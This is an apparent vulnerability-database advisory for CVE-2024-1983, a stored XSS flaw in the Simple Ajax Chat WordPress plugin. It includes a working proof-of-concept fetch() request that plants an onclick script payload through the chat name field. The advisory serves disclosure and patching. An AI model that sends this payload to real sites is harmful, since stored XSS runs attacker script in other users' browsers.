WordPress Plugin Vulnerabilities

Simple Ajax Chat < 20240223 - Unauthenticated Stored XSS

Description

The plugin does not prevent visitors from using malicious Names when using the chat, which will be reflected unsanitized to other users.

Proof of Concept

await fetch("http://vulnerable-site.tld/wp-content/plugins/simple-ajax-chat/simple-ajax-chat-core.php?sacSendChat=yes", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0",
        "Accept": "*/*",
        "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
        "Content-Type": "application/x-www-form-urlencoded",
        "Sec-GPC": "1"
    },
    "body": "n=%22onclick=%22alert`1`%22&c=adasd&u=https%3A%2F%2F&sac_nonce=$NONCE&sac_js_nonce=$NONCE",
    "method": "POST",
    "mode": "cors"
});

Affects Plugins

Plugin icon
simple-ajax-chat
Fixed in 20240223

References

CVE
CVE-2024-1983

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher
fourcade
Submitter
fourcade
Verified
Yes
WPVDB ID
bf3a31de-a227-4db1-bd18-ce6a78dc96fb

Timeline

Publicly Published
2024-02-28 (about 1 months ago)
Added
2024-02-28 (about 1 months ago)
Last Updated
2024-02-28 (about 1 months ago)

Other

Published
Title
Published
2021-07-27
Title
Favicon by RealFaviconGenerator < 1.3.22 - Reflected Cross-Site Scripting (XSS)
Published
2023-05-22
Title
Leyka < 3.30.2 - Reflected XSS
Published
2015-11-24
Title
Social Share Button <= 2.1 - Authenticated Stored Cross-Site Scripting (XSS)
Published
2022-12-29
Title
Video Conferencing with Zoom < 4.0.10 - Contributor+ Stored XSS
Published
2016-04-12
Title
Indexisto WordPress Site Search <= 1.0.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)